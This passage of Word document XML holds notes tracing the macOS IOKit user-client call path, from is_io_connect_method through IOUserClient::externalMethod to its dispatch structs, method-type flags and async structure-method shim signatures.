    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_struct_inband_t inband_input,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t inband_inputCnt,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_vm_address_t ool_input,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_vm_size_t ool_input_size,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>io_struct_inband_t inband_output,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t *inband_outputCnt,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_scalar_inband64_t scalar_output,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t *scalar_outputCnt,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_vm_address_t ool_output,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_vm_size_t *ool_output_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>is_io_connect_method(connection, selector, ... ...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(IOUserClient(Derived)connection)-&gt;externalMethod( selector, &amp;args );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>IOReturn IOUserClient::externalMethod( uint32_t selector, IOExternalMethodArguments * args, IOExternalMethodDispatch * dispatch, OSObject * target, void * reference )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            struct IOExternalMethodDispatch</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IOExternalMethodAction function;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                uint32_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   checkScalarInputCount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                uint32_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   checkStructureInputSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                uint32_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   checkScalarOutputCount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                uint32_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   checkStructureOutputSize;</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ab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>method = getTargetAndMethodForIndex(&amp;object, selector)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            struct IOExternalMethod {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                IOService *</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>object;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                IOMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>func;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                IOOptionBits</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>flags;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                IOByteCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>count0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                IOByteCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>count1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            };            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            enum {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCTypeMask</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>= 0x0000000f,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCScalarIScalarO = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCScalarIStructO = 2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCStructIStructO = 3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCScalarIStructI = 4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                kIOUCForegroundOnly = 0x00000010,</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p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            IOExternalMethod * method=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            getTargetAndMethodForIndex(IOService **targetP, UInt32 index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    IOExternalMethod * IOUserClient::getExternalMethodForIndex( UInt32 /* index */)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            switch (method-&gt;flags &amp; kIOUCTypeMask)</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ab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>shim_io_async_method_structureI_structureO( method, object, ... ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>kern_return_t shim_io_async_method_structureI_structureO(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>IOExternalAsyncMethod *</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>method,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>IOService *</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>object,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_port_t           asyncWakePort,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_user_reference_t * asyncReference,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>uint32_t              asyncReferenceCount,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_struct_inband_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>input,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>inputCount,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_struct_inband_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>output,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t *</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>outputCount )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>input, output, inputCount, outputCount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    01: output, outputCount</w:t>
      </w:r>
    </w:p>
